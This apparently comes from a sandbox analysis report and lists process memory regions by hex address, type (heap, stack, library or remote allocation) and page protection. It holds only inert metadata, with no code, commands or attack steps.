265C0918000
|
heap
|
page read and write
|
||
1FE4B000000
|
heap
|
page read and write
|
||
51B1D7E000
|
stack
|
page read and write
|
||
1C8C412B000
|
heap
|
page read and write
|
||
265A64C9000
|
heap
|
page read and write
|
||
2852E4D0000
|
trusted library allocation
|
page read and write
|
||
52E000
|
stack
|
page read and write
|
||
1C8C4147000
|
heap
|
page read and write
|
||
24B9F056000
|
heap
|
page read and write
|
||
20E35854000
|
heap
|
page read and write
|
||
265A8070000
|
trusted library allocation
|
page read and write
|
||
172BD857000
|
heap
|
page read and write
|
||
BFFC8FF000
|
stack
|
page read and write
|
||
2852E550000
|
remote allocation
|
page read and write
|
||
1C8C4147000
|
heap
|
page read and write
|
||
24B9F06D000
|
heap
|
page read and write
|
||
1B82A713000
|
heap
|
page read and write
|
||
1C8C39AD000
|
heap
|
page read and write
|
||
1C8C4142000
|
heap
|
page read and write
|
||
1C0C1DAC000
|
heap
|
page read and write
|
||
1FB1FA54000
|
heap
|
page read and write
|
||
20E36143000
|
heap
|
page read and write
|
||
1C0C35C0000
|
heap
|
page read and write
|
||
24B9F07B000
|
heap
|
page read and write
|
||
265A9E9E000
|
trusted library allocation
|
page read and write
|
||
265A6420000
|
heap
|
page read and write
|
||
265A8F7E000
|
trusted library allocation
|
page read and write
|
||
24B9F040000
|
heap
|
page read and write
|
||
7FFBAE6FC000
|
trusted library allocation
|
page execute and read and write
|
||
20E35862000
|
heap
|
page read and write
|
||
1C0C1D2B000
|
heap
|
page read and write
|
||
1C8C412B000
|
heap
|
page read and write
|
||
51B1F7F000
|
stack
|
page read and write
|
||
1B82A600000
|
heap
|
page read and write
|
||
265A8090000
|
trusted library allocation
|
page read and write
|
||
933A0CE000
|
stack
|
page read and write
|
||
1C0C1DAF000
|
heap
|
page read and write
|
||
940000
|
heap
|
page read and write
|
||
1C0C1D73000
|
heap
|
page read and write
|
||
265C05C7000
|
heap
|
page execute and read and write
|
||
20E36227000
|
heap
|
page read and write
|
||
265C0460000
|
heap
|
page read and write
|
||
1FB1F9D0000
|
trusted library allocation
|
page read and write
|
||
7FFBAE8F0000
|
trusted library allocation
|
page read and write
|
||
1FE4B03C000
|
heap
|
page read and write
|
||
1C0C1D83000
|
heap
|
page read and write
|
||
1C8C621E000
|
trusted library allocation
|
page read and write
|
||
7FFBAE9C0000
|
trusted library allocation
|
page read and write
|
||
1C0C1D7B000
|
heap
|
page read and write
|
||
20E35F50000
|
trusted library allocation
|
page read and write
|
||
93395FF000
|
stack
|
page read and write
|
||
1C0C1DBB000
|
heap
|
page read and write
|
||
2852CA47000
|
heap
|
page read and write
|
||
7FFBAE7FC000
|
trusted library allocation
|
page read and write
|
||
3811000
|
trusted library allocation
|
page read and write
|
||
265B8395000
|
trusted library allocation
|
page read and write
|
||
7F4000
|
heap
|
page read and write
|
||
1FE4AFD0000
|
trusted library allocation
|
page read and write
|
||
1FB1FA29000
|
heap
|
page read and write
|
||
7FFBAE840000
|
trusted library allocation
|
page read and write
|
||
1C8C4129000
|
heap
|
page read and write
|
||
1C0C1DAF000
|
heap
|
page read and write
|
||
2852CA7A000
|
heap
|
page read and write
|
||
265A9B1C000
|
trusted library allocation
|
page read and write
|
||
24B9F000000
|
heap
|
page read and write
|
||
265C0843000
|
heap
|
page read and write
|
||
1FB1FA13000
|
heap
|
page read and write
|
||
7FFBAE870000
|
trusted library allocation
|
page read and write
|
||
24B9F102000
|
heap
|
page read and write
|
||
6822AFD000
|
stack
|
page read and write
|
||
1C8C39A9000
|
heap
|
page read and write
|
||
24B9F064000
|
heap
|
page read and write
|
||
1C0C1D8D000
|
heap
|
page read and write
|
||
1FE4B029000
|
heap
|
page read and write
|
||
933937A000
|
stack
|
page read and write
|
||
265C0859000
|
heap
|
page read and write
|
||
1C0C1DCD000
|
heap
|
page read and write
|
||
1C0C1D1A000
|
heap
|
page read and write
|
||
7FFBAE9D0000
|
trusted library allocation
|
page read and write
|
||
265A6715000
|
heap
|
page read and write
|
||
780000
|
heap
|
page read and write
|
||
265C047A000
|
heap
|
page read and write
|
||
1FB1FA00000
|
heap
|
page read and write
|
||
1C0C1D93000
|
heap
|
page read and write
|
||
265A8C6D000
|
trusted library allocation
|
page read and write
|
||
51B17CC000
|
stack
|
page read and write
|
||
319F000
|
stack
|
page read and write
|
||
1C0C1D80000
|
heap
|
page read and write
|
||
406000
|
unkown
|
page readonly
|
||
51B1AFE000
|
stack
|
page read and write
|
||
265C084B000
|
heap
|
page read and write
|
||
265C046E000
|
heap
|
page read and write
|
||
7FFBAE640000
|
trusted library allocation
|
page read and write
|
||
1C8C4142000
|
heap
|
page read and write
|
||
265A650A000
|
heap
|
page read and write
|
||
9338D25000
|
stack
|
page read and write
|
||
172BD800000
|
heap
|
page read and write
|
||
20E35790000
|
heap
|
page read and write
|
||
1C8C6290000
|
trusted library allocation
|
page execute
|
||
824214B000
|
stack
|
page read and write
|
||
7FFBAE7F1000
|
trusted library allocation
|
page read and write
|
||
1C8C4147000
|
heap
|
page read and write
|
||
1C0C1DCC000
|
heap
|
page read and write
|
||
265A64FB000
|
heap
|
page read and write
|
||
1C0C1D9F000
|
heap
|
page read and write
|
||
1C0C1D99000
|
heap
|
page read and write
|
||
8C39EFE000
|
stack
|
page read and write
|
||
7DE000
|
heap
|
page read and write
|
||
7FFBAE920000
|
trusted library allocation
|
page read and write
|
||
7FFBAE930000
|
trusted library allocation
|
page read and write
|
||
1C8C3990000
|
heap
|
page read and write
|
||
1C0C1D86000
|
heap
|
page read and write
|
||
D38000
|
heap
|
page read and write
|
||
A94D17F000
|
stack
|
page read and write
|
||
1B82AD12000
|
heap
|
page read and write
|
||
1C0C1D1E000
|
heap
|
page read and write
|
||
1B82A648000
|
heap
|
page read and write
|
||
7FFBAE822000
|
trusted library allocation
|
page read and write
|
||
8FE000
|
stack
|
page read and write
|
||
1C0C1B10000
|
heap
|
page read and write
|
||
7FFBAE8A0000
|
trusted library allocation
|
page read and write
|
||
341E000
|
stack
|
page read and write
|
||
265A8C97000
|
trusted library allocation
|
page read and write
|
||
1C0C1D9E000
|
heap
|
page read and write
|
||
1C8C6217000
|
trusted library allocation
|
page read and write
|
||
2852E490000
|
trusted library allocation
|
page read and write
|
||
1C0C1D7B000
|
heap
|
page read and write
|
||
352148B000
|
stack
|
page read and write
|
||
265A9BE3000
|
trusted library allocation
|
page read and write
|
||
35218FE000
|
stack
|
page read and write
|
||
1B82A702000
|
heap
|
page read and write
|
||
BA0E97F000
|
stack
|
page read and write
|
||
24B9F07E000
|
heap
|
page read and write
|
||
1FE4B046000
|
heap
|
page read and write
|
||
BFFC6FE000
|
stack
|
page read and write
|
||
7FFBAE653000
|
trusted library allocation
|
page read and write
|
||
7FFBAE9A0000
|
trusted library allocation
|
page read and write
|
||
1C8C6230000
|
trusted library allocation
|
page read and write
|
||
20CBCF00000
|
heap
|
page read and write
|
||
7F9000
|
heap
|
page read and write
|
||
7FFBAE643000
|
trusted library allocation
|
page execute and read and write
|
||
1C8C412B000
|
heap
|
page read and write
|
||
1C0C1D76000
|
heap
|
page read and write
|
||
20E3588D000
|
heap
|
page read and write
|
||
7FFBAE830000
|
trusted library allocation
|
page execute and read and write
|
||
172BDF50000
|
remote allocation
|
page read and write
|
||
2852CA56000
|
heap
|
page read and write
|
||
7FFBAE700000
|
trusted library allocation
|
page execute and read and write
|
||
1C8C414B000
|
heap
|
page read and write
|
||
24B9F05C000
|
heap
|
page read and write
|
||
A94D47D000
|
stack
|
page read and write
|
||
32DD000
|
stack
|
page read and write
|
||
1C0C1D93000
|
heap
|
page read and write
|
||
24B9F05E000
|
heap
|
page read and write
|
||
10CA77D000
|
stack
|
page read and write
|
||
1F0000
|
trusted library allocation
|
page read and write
|
||
7FFBAE990000
|
trusted library allocation
|
page read and write
|
||
20CBCE02000
|
heap
|
page read and write
|
||
265C0844000
|
heap
|
page read and write
|
||
10CA8FC000
|
stack
|
page read and write
|
||
6822B7E000
|
stack
|
page read and write
|
||
1C0C1DAB000
|
heap
|
page read and write
|
||
265A9AF4000
|
trusted library allocation
|
page read and write
|
||
381F000
|
trusted library allocation
|
page read and write
|
||
933A14E000
|
stack
|
page read and write
|
||
265A656F000
|
heap
|
page read and write
|
||
1C8C4139000
|
heap
|
page read and write
|
||
2852C9D0000
|
trusted library allocation
|
page read and write
|
||
10CA2FC000
|
stack
|
page read and write
|
||
7FFBAE8C0000
|
trusted library allocation
|
page read and write
|
||
1C0C1D88000
|
heap
|
page read and write
|
||
1C0C1D9B000
|
heap
|
page read and write
|
||
14AB000
|
heap
|
page read and write
|
||
20CBCE13000
|
heap
|
page read and write
|
||
24B9F055000
|
heap
|
page read and write
|
||
1C0C1D55000
|
heap
|
page read and write
|
||
1FE4B002000
|
heap
|
page read and write
|
||
1C0C1DA2000
|
heap
|
page read and write
|
||
5D0000
|
trusted library allocation
|
page read and write
|
||
265A8452000
|
trusted library allocation
|
page read and write
|
||
8241CFF000
|
stack
|
page read and write
|
||
3830000
|
trusted library allocation
|
page read and write
|
||
7FFBAE960000
|
trusted library allocation
|
page read and write
|
||
1C0C35B4000
|
heap
|
page read and write
|
||
7FFBAE6F6000
|
trusted library allocation
|
page read and write
|
||
1C8C410F000
|
heap
|
page read and write
|
||
6DA000
|
unclassified section
|
page read and write
|
||
870000
|
heap
|
page read and write
|
||
51B1C7E000
|
stack
|
page read and write
|
||
401000
|
unkown
|
page execute read
|
||
329B000
|
stack
|
page read and write
|
||
93394F8000
|
stack
|
page read and write
|
||
265A6620000
|
heap
|
page execute and read and write
|
||
1C8C414A000
|
heap
|
page read and write
|
||
1C0C1D86000
|
heap
|
page read and write
|
||
4F0000
|
trusted library allocation
|
page read and write
|
||
1C0C1D9F000
|
heap
|
page read and write
|
||
1B82A3C0000
|
heap
|
page read and write
|
||
933967F000
|
stack
|
page read and write
|
||
1C0C1D70000
|
heap
|
page read and write
|
||
401000
|
unkown
|
page execute read
|
||
1C0C1C96000
|
heap
|
page read and write
|
||
10CA5FF000
|
stack
|
page read and write
|
||
1C8C4147000
|
heap
|
page read and write
|
||
20E35780000
|
heap
|
page read and write
|
||
38DB000
|
trusted library allocation
|
page read and write
|
||
1C0C1D7B000
|
heap
|
page read and write
|
||
265A99BA000
|
trusted library allocation
|
page read and write
|
||
265B8118000
|
trusted library allocation
|
page read and write
|
||
265C04F0000
|
trusted library allocation
|
page read and write
|
||
1C0C1D8C000
|
heap
|
page read and write
|
||
20E361BC000
|
heap
|
page read and write
|
||
265C0830000
|
heap
|
page read and write
|
||
7FFBAE940000
|
trusted library allocation
|
page read and write
|
||
172BD813000
|
heap
|
page read and write
|
||
1C0C1D99000
|
heap
|
page read and write
|
||
933927E000
|
stack
|
page read and write
|
||
933957F000
|
stack
|
page read and write
|
||
265A6400000
|
heap
|
page read and write
|
||
BA0E7FE000
|
stack
|
page read and write
|
||
1C0C1DBB000
|
heap
|
page read and write
|
||
402000
|
unkown
|
page readonly
|
||
1FB1F7A0000
|
heap
|
page read and write
|
||
1FE4B802000
|
trusted library allocation
|
page read and write
|
||
8C39CFB000
|
stack
|
page read and write
|
||
265A8051000
|
trusted library allocation
|
page read and write
|
||
172BD750000
|
heap
|
page read and write
|
||
14A8000
|
heap
|
page read and write
|
||
20E35868000
|
heap
|
page read and write
|
||
24B9F062000
|
heap
|
page read and write
|
||
7FFBAE6F0000
|
trusted library allocation
|
page read and write
|
||
1FB1F800000
|
heap
|
page read and write
|
||
265A8054000
|
trusted library allocation
|
page read and write
|
||
51B1A7E000
|
stack
|
page read and write
|
||
BFFBBAB000
|
stack
|
page read and write
|
||
265A6660000
|
trusted library allocation
|
page read and write
|
||
A94D07F000
|
stack
|
page read and write
|
||
265A8FB7000
|
trusted library allocation
|
page read and write
|
||
7FFBAE890000
|
trusted library allocation
|
page read and write
|
||
24B9F042000
|
heap
|
page read and write
|
||
1C8C3E52000
|
heap
|
page read and write
|
||
24B9F063000
|
heap
|
page read and write
|
||
933907F000
|
stack
|
page read and write
|
||
1C8C40E0000
|
heap
|
page read and write
|
||
1C0C1D8C000
|
heap
|
page read and write
|
||
2852CA57000
|
heap
|
page read and write
|
||
7FFBAE64D000
|
trusted library allocation
|
page execute and read and write
|
||
1C8C4139000
|
heap
|
page read and write
|
||
5C7000
|
heap
|
page read and write
|
||
402000
|
unkown
|
page readonly
|
||
265A8060000
|
trusted library allocation
|
page read and write
|
||
1C0C1DB2000
|
heap
|
page read and write
|
||
1C0C1D55000
|
heap
|
page read and write
|
||
BFFC7FF000
|
stack
|
page read and write
|
||
1FB20002000
|
trusted library allocation
|
page read and write
|
||
404000
|
unkown
|
page write copy
|
||
1C0C1DBB000
|
heap
|
page read and write
|
||
1B82A6C8000
|
heap
|
page read and write
|
||
1C0C1D73000
|
heap
|
page read and write
|
||
1C0C1DBB000
|
heap
|
page read and write
|
||
24B9EEF0000
|
heap
|
page read and write
|
||
30000
|
heap
|
page read and write
|
||
265B80B7000
|
trusted library allocation
|
page read and write
|
||
20CBCE28000
|
heap
|
page read and write
|
||
20E35892000
|
heap
|
page read and write
|
||
265C0920000
|
heap
|
page read and write
|
||
265B80B1000
|
trusted library allocation
|
page read and write
|
||
265C0820000
|
heap
|
page read and write
|
||
20E35800000
|
heap
|
page read and write
|
||
265A6630000
|
trusted library allocation
|
page read and write
|
||
1C0C3640000
|
heap
|
page read and write
|
||
1C0C1D88000
|
heap
|
page read and write
|
||
1C8C62B0000
|
heap
|
page readonly
|
||
7FFBAE850000
|
trusted library allocation
|
page read and write
|
||
7FFBAE726000
|
trusted library allocation
|
page execute and read and write
|
||
1FE4AE80000
|
heap
|
page read and write
|
||
1C0C3570000
|
trusted library allocation
|
page read and write
|
||
265A6663000
|
trusted library allocation
|
page read and write
|
There are 776 hidden memdumps, click here to show them.